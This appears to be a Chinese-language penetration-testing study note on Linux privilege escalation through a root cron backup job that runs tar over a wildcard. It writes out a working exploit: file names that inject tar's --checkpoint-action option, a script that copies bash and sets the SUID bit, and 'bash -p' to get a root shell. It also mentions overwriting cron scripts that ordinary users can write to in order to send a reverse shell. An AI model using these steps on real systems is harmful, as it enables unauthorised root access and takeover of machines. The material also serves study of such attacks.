背景：

运维为了防止数据丢失等，写个定时任务进行数据的打包压缩。由于数据打包压缩命令为tar，tar可以尝试加参数调用其他命令执行。

压缩命令：tar  zxf 1.tar.gz /var/www/*

查看定时任务：cat /etc/crontab

root权限下

定时任务脚本backup.sh：cd /tmp;tar czf /mp/backip.tar.gz * 

chmod +x backup.sh

并且vim /etc/crontab  将backup.sh脚本开启定时任务

普通用户权限下利用计划任务的备份功能tar命令的参数利用

echo "" > "--checkpoint-action=exec=sh test.sh"

echo "" > --checkpoint=1

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > test.sh

这里使用的是linux bash提权

chmod +x test.sh

./bash -p

简单理解：

在备份文件时，用到tar命令，tar命令中的一个参数checkpoint设置为1的时候，可以执行命令

Linux-定时任务文件权限配置不当-WEB&本地

利用不安全的权限分配操作导致的定时文件覆盖

chmod 777 775 等 所有者 组 其他成员说明

当服务器中定时任务的脚本，普通用户可以修改时，我可以进行反弹shell到指定服务器